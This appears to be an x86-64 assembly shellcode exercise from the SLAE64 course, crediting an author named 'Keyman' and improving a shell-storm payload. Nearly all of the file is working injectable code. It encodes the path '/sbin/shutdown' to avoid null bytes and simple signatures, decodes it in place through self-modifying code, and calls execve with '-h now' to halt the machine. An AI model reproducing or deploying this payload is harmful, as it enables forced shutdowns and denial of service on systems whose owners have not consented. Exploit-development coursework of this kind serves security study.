; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-877.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 64 bytes (got shorter by 1 byte :D )
;
; What's new is that some optimization was performed on the
; original code, which freed enough space to do a basic in-place
; decoding of the command string (it decodes to "///sbin/shutdown";
; the extra leading slashes are harmless to path resolution). Every
; byte except the first was decremented by 1 when encoded; the decoder
; adds 1 back to each of those bytes at run time, so the shellcode
; must reside in memory that is both writable and executable.
;
; ===================================================================
 
section .text
global _start
 
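_start:
; Register roles at the execve syscall:
;   rax = 59 (execve), rdi = decoded "///sbin/shutdown",
;   rsi = argv, rdx = 0 (envp = NULL)
; argv is built on the stack as { path, "-h", "now", NULL } so that "-h"
; lands in argv[1], where option parsing conventionally begins. (With "-h"
; in argv[0] it occupies the program-name slot and is never parsed as an
; option, so the launched process would only see "now".)
; rax stays 0 until the very end and doubles as the NULL/terminator value.

xor rax, rax                ; rax = 0
cdq                         ; edx = sign(eax) = 0; writing edx zeroes rdx (envp = NULL)

; -------------------------------------------------------------------
; 1. "-h\0" on the stack, pointer kept in rcx
; -------------------------------------------------------------------

push rax                    ; 8 zero bytes terminate the string
push word 0x682d            ; "-h"
push rsp
pop rcx                     ; rcx = &"-h"

; -------------------------------------------------------------------
; 2. "now\0" on the stack, pointer kept in rbx
; -------------------------------------------------------------------

push rax
push byte 0x77              ; 'w' + 7 zero bytes (imm8 is widened to a qword push)
push word 0x6f6e            ; "no"
push rsp
pop rbx                     ; rbx = &"now"

; -------------------------------------------------------------------
; 3. rdi = address of the encoded path (jmp/call/pop, position-independent)
; -------------------------------------------------------------------

jmp shutdown
cont:
pop rdi                     ; rdi = &c_1 (return address pushed by call)

; -------------------------------------------------------------------
; 4. argv[] = { path, "-h", "now", NULL }, pointer kept in rsi
; -------------------------------------------------------------------

push rax                    ; argv[3] = NULL
push rbx                    ; argv[2] = "now"
push rcx                    ; argv[1] = "-h"
push rdi                    ; argv[0] = path (program-name slot)
push rsp
pop rsi                     ; rsi = argv

; -------------------------------------------------------------------
; 5. decode the path in place: bytes 1..15 of c_1 are stored minus 1
; -------------------------------------------------------------------
; Self-modifying: the payload must live in memory that is writable AND
; executable (a plain read-only .text mapping faults on the add below).
; rcx is free to clobber here; its pointer is already saved in argv.

push 15
pop rcx

do_add:
    add byte [rdi+rcx], 0x01    ; runs for rcx = 15 .. 1; byte 0 ('/') is left unchanged
    loop do_add                 ; size over speed: loop is 2 bytes

; -------------------------------------------------------------------
; 6. execve(rdi, rsi, rdx)
; -------------------------------------------------------------------
; No exit path: if execve fails, rax holds -errno and control falls
; through into "call cont", which re-runs the decoder over the already
; decoded bytes and retries with a corrupted path; it never exits cleanly.

push 59
pop rax
syscall

shutdown:
    call cont
    ; Decodes to "///sbin/shutdown" (16 bytes). NOTE(review): there is no
    ; terminating zero inside the payload (adding one would insert a null
    ; byte); the path is only NUL-terminated if the byte following the
    ; shellcode is 0, e.g. a C string literal's terminator -- confirm for
    ; the delivery vehicle before relying on it.
    c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d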